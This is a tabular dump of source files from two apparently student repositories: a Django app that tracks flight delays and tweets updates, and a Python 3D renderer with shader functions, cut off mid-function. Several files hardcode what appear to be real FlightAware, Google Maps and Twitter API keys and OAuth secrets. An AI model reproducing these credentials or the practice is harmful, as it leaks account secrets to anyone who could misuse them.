index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
49,695 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/restAdapter.py |
class RestAdapter:
def __init__(self):
self.username = 'RaspberyPirates'
self.apiKey = '4b694ca29e116426788a13a11672f6722f3f3353'
self.url = 'https://flightxml.flightaware.com/json/FlightXML3/'
username = None
apiKey = None
url = None
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,696 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/views.py | from django.shortcuts import render
from Presentation.forms import FlightCheckForm
from Presentation.watcherService import WatcherService
def index(request):
""" Index page for the app """
form_class = FlightCheckForm
return render(request, 'presentation/index.html', {
'form': form_class,
})
def results(request, flight_number=None, twitter_handle=None):
""" Captures main form results and displays """
if request.GET['flight_number'] != '':
flight_number = request.GET['flight_number']
if request.GET['twitter_handle'] != '':
twitter_handle = request.GET['twitter_handle']
details = WatcherService.watch(twitter_handel=twitter_handle, flight_number=flight_number)
return render(request, 'presentation/results.html', {
'vm': details,
})
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,697 | bigdatasciencegroup/flightr-project | refs/heads/master | /Gmaps/googlemaps_service.py | """ Main google maps service """
import googlemaps
class GooglemapsService(object):
""" Main service for returning Gmap data, utilises the "googlemaps" python wrapper """
# put this in env variables/settings in live
api_key = 'AIzaSyCHAy-DjgELWCsLPVdciEhm8gSkt4XACTc'
@staticmethod
def get_reverse_geocode_result(userlat_long, result_type=None, location_type=None):
""" Takes Lat and Long of user and returns reverse geocode JSON's formatted address """
gmaps = googlemaps.Client(key=GooglemapsService.api_key)
json_response = gmaps.reverse_geocode(userlat_long, result_type, location_type)
return json_response[0]['formatted_address']
@staticmethod
def get_user_location(return_type=None):
""" Attempts to geolocate the service user and returns lat and long or address if specified """
gmaps = googlemaps.Client(key=GooglemapsService.api_key)
json_response = gmaps.geolocate()
user_location_coords = "%s,%s" % (json_response['location']['lat'], json_response['location']['lng'])
if return_type is None:
return_type = "coords"
if return_type == "address":
return GooglemapsService.get_reverse_geocode_result(user_location_coords)
else:
return user_location_coords
@staticmethod
def get_user_journey_time(origin=None, destination=None, time_type=None):
""" Uses distance matrix to retrieve time to desination, defaults to Aberdeen Airport pickup zone"""
if origin is None:
origin = GooglemapsService.get_user_location()
if destination is None:
destination = "57.1975253, -2.2057843"
if time_type is None:
time_type = 'text'
gmaps = googlemaps.Client(key=GooglemapsService.api_key)
json_response = gmaps.distance_matrix(origin, destination)
return json_response['rows'][0]['elements'][0]['duration'][time_type]
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,698 | bigdatasciencegroup/flightr-project | refs/heads/master | /Twitter/twitterAdapter.py | """Creates an object of the twitter api"""
from twython import Twython
class TwitterAdaptor:
"""API authentication"""
def __init__(self):
self.app_key = '4am7P2QD0tVygnfhXXsYKNxy0'
self.app_secret = 'Fmngx5ds15AHxI1ePYfm91yT0wMV20C8t4yWzyY6VaqjetaXjQ'
self.oauth_token = '905805253907546113-Jfy6Hfpeigfg92fnjnCo6v3XiexBrc5'
self.oauth_token_secret = 'EoDjJBzh8m25Tl4CHZiutCbj7Ns0xks76bjvzSolDKUtM'
self.api = Twython(self.app_key, self.app_secret, self.oauth_token, self.oauth_token_secret)
app_key = None
app_secret = None
oauth_token = None
oauth_token_secret = None
api = None
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,699 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/models.py |
class Flight:
def __init__(self, flight_number, aircraft_type, origin, status, actual_arrival_time, arrival_delay, estimated_arrival_time):
self.fight_number = flight_number
self.aircraft_type = aircraft_type
self.origin = origin
self.status = status
self.actual_arrival_time = actual_arrival_time
self.arrival_delay = arrival_delay
self.estimated_arrival_time = estimated_arrival_time
fight_number = None
aircraft_type = None
origin = None
status = None
actual_arrival_time = None
estimated_arrival_time = None
arrival_delay = None
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,700 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/tests.py | """Tests for the Presentation app module"""
from django.test import TestCase, Client
# Create your tests here.
class HttpTests(TestCase):
"""Specfically Http status code tests"""
CLIENT = Client()
def test_site_root_http_code(self):
"""Checks that the main site root is reachable"""
response = self.CLIENT.get('')
self.assertEqual(response.status_code, 200)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,701 | bigdatasciencegroup/flightr-project | refs/heads/master | /Gmaps/tests.py | """ Test module for Gmaps App """
import requests
from django.test import TestCase
from Gmaps.googlemaps_service import GooglemapsService
# Create your tests here.
class GooglemapsTests(TestCase):
""" Test suite for Google Maps Service """
gmap = GooglemapsService()
gmap_geocode_api = 'https://maps.googleapis.com/maps/api/geocode/json'
# put this in env variables/settings in live
api_key = 'AIzaSyCHAy-DjgELWCsLPVdciEhm8gSkt4XACTc'
def test_api_key_not_none(self):
""" Tests whether API key is populated in Gmap service """
assert self.gmap.api_key != ""
def test_google_api_endpoint_status(self):
""" Checks that we get a HTTP 200 back from the API endpoint
using the geolocation API and our API key """
params = {
'latlng': '51.5236819, -0.1586294',
'sensor': 'false',
'region': 'uk',
'key': self.api_key
}
# Do the request and get the response data
req = requests.get(self.gmap_geocode_api, params=params)
res = req.json()
# Use the first result
status = res['status']
assert status == 'OK'
def test_google_api_geolocation(self):
""" Tests that geolocation coords sent are returned by the geolocation
service correctly """
test_latlng_initial = '51.5236819, -0.1586294'
params = {
'latlng': test_latlng_initial,
'sensor': 'false',
'region': 'uk',
'key': self.api_key
}
# Do the request and get the response data
req = requests.get(self.gmap_geocode_api, params=params)
res = req.json()
# Use the first result
result = res['results'][0]
geodata = dict()
geodata['lat'] = result['geometry']['location']['lat']
geodata['lng'] = result['geometry']['location']['lng']
geodata['coord_string'] = "%s, %s" % (geodata['lat'], geodata['lng'])
assert geodata['coord_string'] == test_latlng_initial
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,702 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/forms.py | from django import forms
class FlightCheckForm(forms.Form):
""" Form schema for main submission """
flight_number = forms.CharField(required=True, widget=forms.TextInput(attrs={'class' : 'form-control'}))
twitter_handle = forms.CharField(required=False, widget=forms.TextInput(attrs={'class' : 'form-control'}))
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,703 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/watcherService.py | import threading
from Flightaware.flightawareService import FlightawareService
from Gmaps.googlemaps_service import GooglemapsService
from Presentation.models import FlightDetails
from Twitter.TwitterService import TwitterService
import time
class WatcherService(object):
@staticmethod
def get_details(flight_number):
flight = FlightawareService.find_flight(flight_number)
epoch_time = int(time.time())
journey_time = GooglemapsService.get_user_journey_time(time_type='value')
arrival_time = (flight.estimated_arrival_time['epoch'] - flight.arrival_delay)
suggested_delay = (int(arrival_time) - int(epoch_time)) - int(journey_time)
suggested_departure_time = (int(epoch_time) + suggested_delay)
arrival_delay = flight.arrival_delay
if arrival_delay == 0:
arrival_delay = "No delay"
else:
m, s = divmod(arrival_delay, 60)
h, m = divmod(m, 60)
if h < 1:
arrival_delay = "%d Minutes" % m
else:
arrival_delay = "%d Hours and %d Minutes" % (h, m)
time_to_leave = suggested_departure_time - (int(epoch_time))
m, s = divmod(time_to_leave, 60)
h, m = divmod(m, 60)
if h < 1:
time_to_leave = "%d Minutes" % m
else:
time_to_leave = "%d Hours and %d Minutes" % (h, m)
suggested_departure_time = time.strftime('%H:%M %d/%m/%Y', time.localtime(suggested_departure_time))
journey_time = GooglemapsService.get_user_journey_time()
return FlightDetails(flight_number=flight.fight_number,
flight_status=flight.status,
current_flight_delay=arrival_delay,
journey_time_to_airport=journey_time,
suggested_time_to_start_journey=suggested_departure_time,
time_till_leave_time=time_to_leave)
@staticmethod
def watch(twitter_handel, flight_number):
flight = WatcherService.get_details(flight_number)
thread = threading.Thread(target=WatcherService.start_watch, args=(twitter_handel, flight_number))
thread.start()
return flight
@staticmethod
def start_watch(twitter_handel, flight_number):
flight = WatcherService.get_details(flight_number)
status = None
delay = None
journey_time = None
is_first_run = True
while flight.flight_status != 'Arrived':
if is_first_run:
TwitterService.send_notification(twitter_handle=twitter_handel,
message='The status of you flight is: ' + flight.flight_status)
TwitterService.send_notification(twitter_handle=twitter_handel,
message='Your flight is delayed by: ' + flight.current_flight_delay)
TwitterService.send_notification(twitter_handle=twitter_handel,
message='Your current journey time is: '
+ flight.journey_time_to_airport)
is_first_run = False
if flight.flight_status != status:
TwitterService.send_notification(twitter_handle=twitter_handel,
message='The status of your flight is: ' + status)
status = flight.flight_status
if flight.current_flight_delay != delay:
TwitterService.send_notification(twitter_handle=twitter_handel,
message='Your flight is delayed by: ' + delay)
delay = flight.current_flight_delay
if flight.journey_time_to_airport != journey_time:
TwitterService.send_notification(twitter_handle=twitter_handel,
message='Your current journey time is: '
+ journey_time
+ ' You should start your journey at: '
+ flight.suggested_time_to_start_journey)
journey_time = flight.journey_time_to_airport
flight = WatcherService.get_details(flight_number)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,704 | bigdatasciencegroup/flightr-project | refs/heads/master | /Twitter/tests.py | from django.test import TestCase
from Twitter.twitterAdapter import TwitterAdaptor
class TwitterTests(TestCase):
def test_adapter_initialises(self):
adapter = TwitterAdaptor()
self.assertIsNotNone(adapter.api)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,705 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/tests.py | from django.test import TestCase
from mock import MagicMock
from Flightaware.flightawareService import FlightawareService
from Flightaware.models import Flight
class FlightawareTests(TestCase):
def test_find_flight(self):
expected_flight = Flight(flight_number='N1234',
aircraft_type='jet',
origin='Berlin',
status='Flying',
actual_arrival_time='time',
arrival_delay='time',
estimated_arrival_time='time')
response = MagicMock()
response.json = MagicMock(
return_value={'FlightInfoStatusResult': {'flights': [
{'ident': expected_flight.fight_number,
'aircrafttype': expected_flight.aircraft_type,
'origin': expected_flight.origin,
'status': expected_flight.status,
'actual_arrival_time': expected_flight.actual_arrival_time,
'arrival_delay': expected_flight.arrival_delay,
'estimated_arrival_time': expected_flight.estimated_arrival_time,}]}})
actual_flight = FlightawareService.find_flight(expected_flight.fight_number, response)
self.assertEqual(expected_flight.fight_number, actual_flight.fight_number)
self.assertEqual(expected_flight.aircraft_type, actual_flight.aircraft_type)
self.assertEqual(expected_flight.origin, actual_flight.origin)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,707 | campeon19/Engine3D_Graficas | refs/heads/main | /Lab1.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2
# width = 800
# height = 600
width = 940
height = 540
# width = 100
# height = 100
rend = Renderer(width, height)
Pol1=[(165, 380), (185, 360), (180, 330), (207, 345), (233, 330), (230, 360), (250, 380), (220, 385), (205, 410), (193, 383)]
Pol2=[(321, 335), (288, 286), (339, 251), (374, 302)]
Pol3=[(377, 249), (411, 197), (436, 249)]
Pol4=[(413, 177), (448, 159), (502, 88), (553, 53), (535, 36), (676, 37), (660, 52),
(750, 145), (761, 179), (672, 192), (659, 214), (615, 214), (632, 230), (580, 230),
(597, 215), (552, 214), (517, 144), (466, 180)]
Pol5=[(682, 175), (708, 120), (735, 148), (739, 170)]
rend.glDrawPolygon(Pol1)
rend.glDrawPolygon(Pol2)
rend.glDrawPolygon(Pol3)
rend.glDrawPolygon(Pol4)
rend.glDrawPolygon(Pol5)
rend.glScanLine()
rend.glLine(V2(181, 330),V2(232, 330), rend.glColor(0,0,0))
rend.glLine(V2(182, 331),V2(231, 331), rend.glColor(0,0,0))
rend.glLine(V2(412, 197),V2(543, 197), rend.glColor(0,0,0))
rend.glLine(V2(413, 198),V2(543, 198), rend.glColor(0,0,0))
rend.glLine(V2(428, 230),V2(579, 230), rend.glColor(0,0,0))
rend.glLine(V2(413, 180),V2(534, 180), rend.glColor(0,0,0))
rend.glLine(V2(533, 175),V2(761, 175), rend.glColor(1,1,1))
rend.glLine(V2(416, 175),V2(473, 175), rend.glColor(1,1,1))
rend.glLine(V2(459, 144),V2(696, 144), rend.glColor(1,1,1))
rend.glLine(V2(731, 144),V2(749, 144), rend.glColor(1,1,1))
rend.glLine(V2(182, 335),V2(189, 335), rend.glColor(1,1,1))
rend.glLine(V2(224, 335),V2(231, 335), rend.glColor(1,1,1))
rend.glFinish("Lab1.bmp") | {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,708 | campeon19/Engine3D_Graficas | refs/heads/main | /shaders.py |
from itertools import count
import matematica as mate
import numpy as np
import random
def flat(render, **kwargs):
u,v,w = kwargs['baryCoords']
tA,tB,tC = kwargs['texCoords']
A, B, C = kwargs['verts']
b,g,r = kwargs['color']
b/=255
g/=255
r/=255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
normal = mate.productoCruz3D(mate.restaVect(B,A), mate.restaVect(C,A))
normal = mate.normalizar3D(normal)
intensity = mate.productoPunto(normal, render.directional_light)
b *= intensity
g *= intensity
r *= intensity
if intensity > 0:
return r,g,b
else:
return 0,0,0
return r,g,b
def gourand(render, **kwargs):
u,v,w = kwargs['baryCoords']
tA,tB,tC = kwargs['texCoords']
A, B, C = kwargs['verts']
b,g,r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/=255
g/=255
r/=255
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensityA = mate.productoPunto(nA, dirLight)
intensityB = mate.productoPunto(nB, dirLight)
intensityC = mate.productoPunto(nC, dirLight)
intensity = intensityA *u + intensityB *v + intensityC *w
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def phong(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity > 1:
intensity = 1
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def unlit(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
return r, g, b
def toon(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity > 0.7:
intensity = 1
elif intensity > 0.3:
intensity = 0.5
else:
intensity = 0.05
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def textureBlend(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [-render.directional_light[0],
-render.directional_light[1],
-render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity < 0:
intensity = 0
b*= intensity
g*= intensity
r*= intensity
if render.active_texture2:
texColor = render.active_texture2.getColor(tx, ty)
b += (texColor[0] / 255) * (1 - intensity)
g += (texColor[1] / 255) * (1 - intensity)
r += (texColor[2] / 255) * (1 - intensity)
return r, g, b
def normalMap(render, **kwargs):
A, B, C = kwargs['verts']
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = np.array(render.directional_light)
if render.normal_map:
texNormal = render.normal_map.getColor(tx, ty)
texNormal = [(texNormal[2] / 255) * 2 - 1,
(texNormal[1] / 255) * 2 - 1,
(texNormal[0] / 255) * 2 - 1]
texNormal = texNormal / np.linalg.norm(texNormal)
edge1 = np.subtract(B, A)
edge2 = np.subtract(C, A)
deltaUV1 = np.subtract(tB, tA)
deltaUV2 = np.subtract(tC, tA)
f = 1 / (deltaUV1[0] * deltaUV2[1] - deltaUV2[0] * deltaUV1[1])
tangent = [f * (deltaUV2[1] * edge1[0] - deltaUV1[1] * edge2[0]),
f * (deltaUV2[1] * edge1[1] - deltaUV1[1] * edge2[1]),
f * (deltaUV2[1] * edge1[2] - deltaUV1[1] * edge2[2])]
tangent = tangent / np.linalg.norm(tangent)
tangent = np.subtract(tangent, np.multiply(np.dot(tangent, normal), normal))
tangent = tangent / np.linalg.norm(tangent)
bitangent = np.cross(normal, tangent)
bitangent = bitangent / np.linalg.norm(bitangent)
tangentMatrix = np.matrix([[tangent[0], bitangent[0], normal[0]],
[tangent[1], bitangent[1], normal[1]],
[tangent[2], bitangent[2], normal[2]]])
texNormal = tangentMatrix @ texNormal
texNormal = texNormal.tolist()[0]
texNormal = texNormal / np.linalg.norm(texNormal)
intensity = np.dot(texNormal, dirLight)
else:
intensity = np.dot(normal, dirLight)
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def shader1(render, **kwargs):
# Inversion de colores
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
b = mate.valAbsoluto(b - 1)
g = mate.valAbsoluto(g - 1)
r = mate.valAbsoluto(r - 1)
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def shader2(render, **kwargs):
# Degradacion de color utilizando las coordenadas baricentricas
A, B, C = kwargs['verts']
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
b*= u
g*= v
r*= w
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def shader3(render, **kwargs):
# Randomizando colores utilizando la coordenada baricentrica u para dar un toque tipo roca
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
b*= random.random() * u
g*= random.random() * u
r*= random.random() * u
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
A, B, C = kwargs['verts']
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
# numero = random.randint(0,10)
# if numero > 5:
# b*=0
# g*=0
# r*=0
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def glow(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity <= 0:
